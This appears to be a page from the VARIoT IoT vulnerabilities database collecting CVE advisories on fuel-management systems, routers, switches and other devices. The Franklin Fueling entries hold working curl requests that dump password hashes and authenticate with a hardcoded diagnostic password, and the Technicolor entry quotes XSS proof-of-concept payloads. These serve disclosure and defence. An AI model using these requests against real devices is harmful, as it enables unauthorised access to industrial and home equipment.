VARIoT IoT vulnerabilities database

cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 allows remote attackers to discover sensitive information (user names and password hashes) via the cmdWebGetConfiguration action in a TSA_REQUEST. Franklin Fueling Systems are prone to a security bypass vulnerability. Successfully exploiting this issue may allow an attacker to gain access to sensitive configuration information including credentials. This may aid in further attacks. Franklin Fueling Systems 2.0.0.6833 is vulnerable; other versions may also be affected. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions. Affects prior to version 2.4.0 Product description: A fuel management system with a programmable interface used for inventory and delivery management. Finding 1: Insufficient Access Control Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs CVE: CVE-2013-7247 CWE: CWE-200 As the Guest user (the lowest privilege), a user can post the cmdWebGetConfiguration parameter to cgi-bin/tsaws.cgi. This will return the usernames and password hashes (in DES format) for all users of the application. Once dumped, they can be cracked and used to access authenticated portions of the application. #Request curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://<ip>:10001/cgi-bin/tsaws.cgi #Response <TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION> <DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/> <ROLE_LIST> <ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/> <ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/> <ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/> </ROLE_LIST> </CONFIGURATION></TSA_RESPONSE></TSA_RESPONSE_LIST> Finding 2: Hardcoded Technician Credentials Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs CVE: CVE-2013-7248 CWE: CWE-798 The three primary users on the TS550 are roleGuest, roleUser, and roleAdmin. Another user exists with additional access named roleDiag. This user can access extra portions of the application such as the command line interface, enable and disable SSH, as well as run SQL commands all from the web interface. The CLI interface includes the ability to run engineering and manufacturing commands. The password for roleDiag is the key (a value returned with every POST request to tsaws.cgi) DES encrypted. This can be done in Ruby: $ irb 1.9.3p374 :001 > "11111111".crypt("aa") => "aaDTlAa1fGGC." #Request curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST PASSWORD="aaDTlAa1fGGC."><TSA_REQUEST COMMAND="cmdWebCheckRole"/></TSA_REQUEST_LIST>' http://<ip>:10001/cgi-bin/tsaws.cgi #Response (note the ROLE) <TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-03-04T16:53:01Z" TIME_STAMP_LOCAL="2013-03-04T11:53:01" KEY="11111111" ROLE="roleDiag"><TSA_RESPONSE COMMAND="cmdWebCheckRole"></TSA_RESPONSE></TSA_RESPONSE_LIST> The password can then be used to run various roleDiag commands. An attacker can enable SSH, and since root's password is the same as roleAdmin, they can completely compromise the device. However, Trustwave SpiderLabs have not verified this fix. Revision History: 04/16/13 - Vulnerability disclosed to vendor 12/18/13 - Fix released on a limited basis by vendor 01/03/14 - Advisory published References 1. http://www.franklinfueling.com/evo/ About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ________________________________ This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format

Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST. Franklin Fueling Systems TS-550 evo is prone to a security-bypass vulnerability. Attackers can exploit this issue to bypass the authentication mechanism and gain access to the vulnerable device. Franklin Fueling Systems 2.0.0.6833 is vulnerable; other versions may also be affected. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions. A remote attacker can use this to gain root privileges and take full control of the device. Affects prior to version 2.4.0 Product description: A fuel management system with a programmable interface used for inventory and delivery management. Finding 1: Insufficient Access Control Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs CVE: CVE-2013-7247 CWE: CWE-200 As the Guest user (the lowest privilege), a user can post the cmdWebGetConfiguration parameter to cgi-bin/tsaws.cgi. This will return the usernames and password hashes (in DES format) for all users of the application. Once dumped, they can be cracked and used to access authenticated portions of the application. #Request curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://<ip>:10001/cgi-bin/tsaws.cgi #Response <TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION> <DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/> <ROLE_LIST> <ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/> <ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/> <ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/> </ROLE_LIST> </CONFIGURATION></TSA_RESPONSE></TSA_RESPONSE_LIST> Finding 2: Hardcoded Technician Credentials Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs CVE: CVE-2013-7248 CWE: CWE-798 The three primary users on the TS550 are roleGuest, roleUser, and roleAdmin. Another user exists with additional access named roleDiag. This user can access extra portions of the application such as the command line interface, enable and disable SSH, as well as run SQL commands all from the web interface. The CLI interface includes the ability to run engineering and manufacturing commands. The password for roleDiag is the key (a value returned with every POST request to tsaws.cgi) DES encrypted. This can be done in Ruby: $ irb 1.9.3p374 :001 > "11111111".crypt("aa") => "aaDTlAa1fGGC." #Request curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST PASSWORD="aaDTlAa1fGGC."><TSA_REQUEST COMMAND="cmdWebCheckRole"/></TSA_REQUEST_LIST>' http://<ip>:10001/cgi-bin/tsaws.cgi #Response (note the ROLE) <TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-03-04T16:53:01Z" TIME_STAMP_LOCAL="2013-03-04T11:53:01" KEY="11111111" ROLE="roleDiag"><TSA_RESPONSE COMMAND="cmdWebCheckRole"></TSA_RESPONSE></TSA_RESPONSE_LIST> The password can then be used to run various roleDiag commands. An attacker can enable SSH, and since root's password is the same as roleAdmin, they can completely compromise the device. However, Trustwave SpiderLabs have not verified this fix. Revision History: 04/16/13 - Vulnerability disclosed to vendor 12/18/13 - Fix released on a limited basis by vendor 01/03/14 - Advisory published References 1. http://www.franklinfueling.com/evo/ About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ________________________________ This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format

The Appotech AX211 / AX215 is a microcontroller device. The Appotech AX211 / AX215 8-bit SD card controller has a security vulnerability in the firmware upgrade mechanism. The attacker sends a 'knock' command (CMD63 followed by 'A', 'P', 'P', 'O')). The controller enters firmware load mode, and an attacker who can physically access the memory card can execute arbitrary commands on the card.

Linksys is a division of Cisco Systems that sells home and small business networking products. Linksys was originally founded in 1988 and was acquired by Cisco in 2003. Although Linksys is best known for its broadband and wireless routers, it also produces Ethernet switching and VoIP devices as well as many other products. Many Linksys products (including Linksys WAG200G, Linksys WAG320N, Linksys WAG54G2, Linksys WAG120N, Linksys WAP4410N) have unauthorized access vulnerabilities in their implementation. Attackers can use these vulnerabilities to execute commands on the affected device with administrator privileges. Multiple Routers are prone to an unauthorized-access vulnerability. This may aid in further attacks

Multiple cross-site scripting (XSS) vulnerabilities in Technicolor (formerly Thomson) TC7200 STD6.01.12 allow remote attackers to inject arbitrary web script or HTML via the (1) ADDNewDomain parameter to parental/website-filters.asp or (2) VmTracerouteHost parameter to goform/status/diagnostics-route. (1) parental/website-filters.asp of ADDNewDomain Parameters (2) goform/status/diagnostics-route of VmTracerouteHost Parameters. The Technicolor TC7200 is a next-generation wireless home gateway device. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. Technicolor TC7200 STD6.01.12 is vulnerable. Technicolor (formerly known as Thomson, Thomson) TC7200 is a modem and router product of the French Technicolor Group. The vulnerability comes from the parental/website-filters.asp script not correctly filtering the 'ADDNewDomain' parameter and the goform/status/diagnostics-route script not correctly filtering the 'VmTracerouteHost' parameter. # Exploit Title: Technicolor TC7200 - Multiple XSS Vulnerabilities # Google Dork: N/A # Date: 02-01-2013 # Exploit Author: Jeroen - IT Nerdbox # Vendor Homepage: http://www.technicolor.com/en/solutions-services/connected-home/modems-gatew ays/cable-modems-gateways/tc7200-tc7300 # Software Link: N/A # Version: STD6.01.12 # Tested on: N/A # CVE : CVE-2014-0620 # # Proof of Concept: # # ## Persistent Cross Site Scripting: # # POST : http://<ip>/parental/website-filters.asp # Parameters: # # WebFilteringTable 0 # WebFilteringChangePolicies 0 # WebFiltersADDKeywords # WebFilteringdomainMode 0 # ADDNewDomain <script>alert('IT Nerdbox');</script> # WebFiltersKeywordButton 0 # WebFiltersDomainButton 1 # WebPolicyName # WebFiltersRemove 0 # WebFiltersADD 0 # WebFiltersReset 0 # # ## Reflected Cross Site Scripting # # POST : http://<ip>//goform/status/diagnostics-route # Parameters: # # VmTracerouteHost "><script>alert('IT Nerdbox');</script> # VmMaxTTL 30 # VmTrIsInProgress 0 # VmTrUtilityCommand 1 # # Check out the video at: http://www.nerdbox.it/technicolor-tc7200-xss-vulnerabilities/

Multiple cross-site request forgery (CSRF) vulnerabilities in Technicolor (formerly Thomson) TC7200 STD6.01.12 allow remote attackers to hijack the authentication of administrators for requests that (1) perform a factory reset via a request to goform/system/factory, (2) disable advanced options via a request to goform/advanced/options, (3) remove ip-filters via the IpFilterAddressDelete1 parameter to goform/advanced/ip-filters, or (4) remove firewall settings via the cbFirewall parameter to goform/advanced/firewall. (2) goform/advanced/options Extended options via request to (advanced option) Is disabled. (3) goform/advanced/ip-filters of IpFilterAddressDelete1 Via parameters ip-filters Deleted. (4) goform/advanced/firewall of cbFirewall Firewall settings are removed via parameters. The Technicolor TC7200 is a next-generation wireless home gateway device. Technicolor TC7200 is prone to multiple cross-site request-forgery vulnerabilities. Exploiting these issues may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected device. Other attacks are also possible. Technicolor TC7200 STD6.01.12 is vulnerable. Technicolor (formerly known as Thomson, Thomson) TC7200 is a modem and router product of the French Technicolor Group

The BGP implementation in Cisco NX-OS 6.2(2a) and earlier does not properly handle the interaction of UPDATE messages with IPv6, VPNv4, and VPNv6 labeled unicast-address families, which allows remote attackers to cause a denial of service (peer reset) via a crafted message, aka Bug ID CSCuj03174. The Cisco Nexus Series switches are data center switches. Adopt the Cisco Nexus OS operating system. This issue is being tracked by Cisco Bug ID CSCuj03174. There is a denial of service vulnerability in the Border Gateway Protocol (BGP) function of Cisco NX-OS Software 6.2(2a) and earlier versions

SQL injection vulnerability in the web interface in Cisco Unified Presence Server allows remote authenticated users to execute arbitrary SQL commands via a crafted URL, aka Bug ID CSCuh35615. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. This issue is being tracked by Cisco Bug ID CSCuh35615. This component is responsible for collecting the user's availability status and communication capability information

The CloudEngine series is Huawei's \"cloud\" high-performance switch for next-generation data centers and high-end campuses. If an attacker has a low-privileged user name and password and is able to log in to the affected device, they can exploit these vulnerabilities to bypass server authentication checks, escalate user privileges, and execute arbitrary commands. Huawei CloudEngine Series Switches are the CloudEngine series switches of Huawei. A security bypass vulnerability exists in Huawei CloudEngine series switches. An attacker could use this vulnerability to bypass security restrictions and perform unauthorized operations

The D-Link DSL-2750U is a DSL router device. Allows remote attackers to exploit vulnerabilities to build malicious URIs, entice users to resolve, and perform malicious actions in the context of the target user. D-Link DSL-2750U is a wireless router and ADSL broadband cat all-in-one product from D-Link. A cross-site request forgery vulnerability exists in D-Link DSL-2750U. Attackers can use this vulnerability to perform management operations and gain access to affected devices. Other forms of attacks may also exist

RealVNC VNC 5.0.6 on Mac OS X, Linux, and UNIX allows local users to gain privileges via a crafted argument to the (1) vncserver, (2) vncserver-x11, or (3) Xvnc helper. VNC is prone to multiple local privilege-escalation vulnerabilities. Local attackers can exploit these issues to execute arbitrary code with root privileges. VNC 5.0.6 is vulnerable; other versions may also be affected. RealVNC VNC is a set of remote access and control software from British RealVNC company. The software supports cross-platform remote control, single sign-on, AES encryption, etc

The management web interface on the Nisuta NS-WIR150NE router with firmware 5.07.41 and Nisuta NS-WIR300N router with firmware 5.07.36_NIS01 allows remote attackers to bypass authentication via a "Cookie: :language=en" HTTP header. Nisuta routers are router devices. Nisuta multiple router devices remotely manage the WEB interface for security vulnerabilities. Because the program uses built-in cookies to manage authentication, submitting a specially crafted HTTP request bypasses authentication and operates router settings. Nisuta NS-WIR150NE and NS-WIR300N devices are prone to a remote authentication-bypass vulnerability. Remote attackers can exploit this issue to gain unauthorized access and perform administrative actions. The following are vulnerable: Nisuta NS-WIR150NE running firmware version 5.07.41 Nisuta NS-WIR300N running firmware version 5.07.36_NIS01. Both Nisuta NS-WIR150NE and NS-WIR300N are wireless routers produced by Spanish Nisuta Company

webman/imageSelector.cgi in Synology DiskStation Manager (DSM) 4.0 before 4.0-2259, 4.2 before 4.2-3243, and 4.3 before 4.3-3810 Update 1 allows remote attackers to append data to arbitrary files, and consequently execute arbitrary code, via a pathname in the SLICEUPLOAD X-TMP-FILE HTTP header. Synology Provided by DiskStation Manager Is HTTP There is a problem with request processing, and there is a vulnerability with poor access control. Attacks using this vulnerability have been observed. Also, the attack code using this vulnerability has been released.By a remote third party, root It may be additionally written to a file on the system with permission. As a result, arbitrary code may be executed. Synology DiskStation Manager is prone to a remote command-execution vulnerability. An attacker can exploit this issue to execute arbitrary commands with root privileges. Synology DiskStation Manager 4.x are vulnerable; other versions may also be affected. Synology DiskStation Manager (DSM) is an operating system developed by Synology for network storage servers (NAS). The operating system can manage data, documents, photos, music and other information. A security vulnerability exists in the webman/imageSelector.cgi file in Synology DSM 4.3-3776-3 and earlier versions. http://www.synology.com/en-global/company/news/article/437 February 14, 2014\x97Synology\xae confirmed known security issues (reported as CVE-2013-6955 and CVE-2013-6987) which would cause compromise to file access authority in DSM. An updated DSM version resolving these issues has been released accordingly. The followings are possible symptoms to appear on affected DiskStation and RackStation: Exceptionally high CPU usage detected in Resource Monitor: CPU resource occupied by processes such as dhcp.pid, minerd, synodns, PWNED, PWNEDb, PWNEDg, PWNEDm, or any processes with PWNED in their names Appearance of non-Synology folder: An automatically created shared folder with the name \x93startup\x94, or a non-Synology folder appearing under the path of \x93/root/PWNED\x94 Redirection of the Web Station: \x93Index.php\x94 is redirected to an unexpected page Appearance of non-Synology CGI program: Files with meaningless names exist under the path of \x93/usr/syno/synoman\x94 Appearance of non-Synology script file: Non-Synology script files, such as \x93S99p.sh\x94, appear under the path of \x93/usr/syno/etc/rc.d\x94 If users identify any of above situation, they are strongly encouraged to do the following: For DiskStation or RackStation running on DSM 4.3, please follow the instruction here (http://www.synology.com/en-global/support/faq/348) to REINSTALL DSM 4.3-3827. For DiskStation or RackStation running on DSM 4.0, it\x92s recommended to REINSTALL DSM 4.0-2259 or onward from Synology Download Center. For DiskStation or RackStation running on DSM 4.1 or DSM 4.2, it\x92s recommended to REINSTALL DSM 4.2-3243 or onward from Synology Download Center (http://www.synology.com/en-global/support/download). Confidentiality Impact Complete (There is total information disclosure, resulting in all system files being revealed.) Integrity Impact Complete (There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the entire system being compromised.) Availability Impact Complete (There is a total shutdown of the affected resource. The attacker can render the resource completely unavailable.) Access Complexity Low (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit. ) Authentication Not required (Authentication is not required to exploit the vulnerability.) Gained Access None Vulnerability Type(s) Execute Code This is also known as the /PWNED or /lolz hack

Cisco IOS XE 3.7S(.1) and earlier allows remote attackers to cause a denial of service (Packet Processor crash) via fragmented MPLS IP packets, aka Bug ID CSCul00709. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. The vulnerability is that there is an input verification error when processing a specially crafted MPLS IP packet. The attacker can use this vulnerability to inject a special MPLS IP packet to trigger the vulnerability. Successful exploits will allow attackers to cause the CPP process to crash, denying service to legitimate users. This issue is being tracked by Cisco Bug ID CSCul00709

Hitachi Cosminexus is an application server software. Hitachi Cosminexus JAX-WS component has a security vulnerability when parsing XML entities. Allows remote attackers to exploit vulnerabilities to obtain arbitrary file and directory information through specially crafted SOAP messages containing references to external entities, leading to the disclosure of sensitive information.

The VTY authentication implementation in Cisco IOS XE 03.02.xxSE and 03.03.xxSE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. Cisco IOS XE Software is prone to a remote authentication-bypass vulnerability. Exploiting this issue could allow an attacker to bypass certain security restrictions and perform unauthorized actions with elevated privileges on the device running the vulnerable application. This issue is tracked by Cisco Bug ID CSCuj90227. The vulnerability is caused by the program not properly validating the Linux-IOS internal network configuration

GE Proficy CIMPLICITY is a monitoring software developed by GE and one of the industry's leading HMI/SCADA software. General Electric (GE) Proficy HMI/SCADA - The CIMPLICITY WebView component (CimWebServer.exe) has an unexplained flaw that allows a remote attacker to exploit a vulnerability to execute arbitrary commands in the context of an application

GE Proficy CIMPLICITY is a monitoring software developed by GE and one of the industry's leading HMI/SCADA software. General Electric (GE) Proficy HMI/SCADA - CIMPLICITY WebView The CimWeb component (gefebt.exe) incorrectly verifies user-submitted HTTP traffic, allowing remote attackers to exploit vulnerabilities to execute arbitrary commands in the application context

Tor before 0.2.4.20, when OpenSSL 1.x is used in conjunction with a certain HardwareAccel setting on Intel Sandy Bridge and Ivy Bridge platforms, does not properly generate random numbers for (1) relay identity keys and (2) hidden-service identity keys, which might make it easier for remote attackers to bypass cryptographic protection mechanisms via unspecified vectors. Tor (The Onion Router) is an implementation of the second generation onion routing, which is mainly used to access the Internet anonymously. There are security holes in Tor. An attacker could use this vulnerability to bypass security restrictions. There are vulnerabilities in Tor 0.2.4.19. Other versions may also be affected. This may aid in further attacks. Update to version 0.2.4.22 solves these major and security problems: - Block authority signing keys that were used on authorities vulnerable to the heartbleed bug in OpenSSL (CVE-2014-0160). - Fix a memory leak that could occur if a microdescriptor parse fails during the tokenizing step. - The relay ciphersuite list is now generated automatically based on uniform criteria, and includes all OpenSSL ciphersuites with acceptable strength and forward secrecy. - Relays now trust themselves to have a better view than clients of which TLS ciphersuites are better than others. - Clients now try to advertise the same list of ciphersuites as Firefox 28. For other changes see the upstream change log _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7295 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 http://advisories.mageia.org/MGASA-2014-0059.html http://advisories.mageia.org/MGASA-2014-0256.html _______________________________________________________________________ Updated Packages: Mandriva Business Server 1/X86_64: 77035fd2ff3c6df5effbaf9ee78bdaf4 mbs1/x86_64/tor-0.2.4.22-1.mbs1.x86_64.rpm cccaec1a8425ebfce0bb7d8057d38d6e mbs1/SRPMS/tor-0.2.4.22-1.mbs1.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFTmDAPmqjQ0CJFipgRAqq4AJ9ZIEn/fqUynENotuSA2kTLnKwpJgCgkh59 ssWQCdn4l3H2KyxX+IQBsxw= =fSis -----END PGP SIGNATURE-----

The application did not adequately filter the user-submitted input. Vimicro Vilar IP Camera is a series of network camera products from China Vimicro. An HTML injection vulnerability exists in the Vimicro Vilar IP Camera, which originates from applications that do not adequately filter input submitted by users. An attacker could use this vulnerability to run HTML and script code provided by the attacker in the context of an affected browser, steal cookie-based authentication, or control how the site is presented to users. There are vulnerabilities in Vimicro Corp IP-001A 1.1.0.32, other versions may also be affected. Other attacks are also possible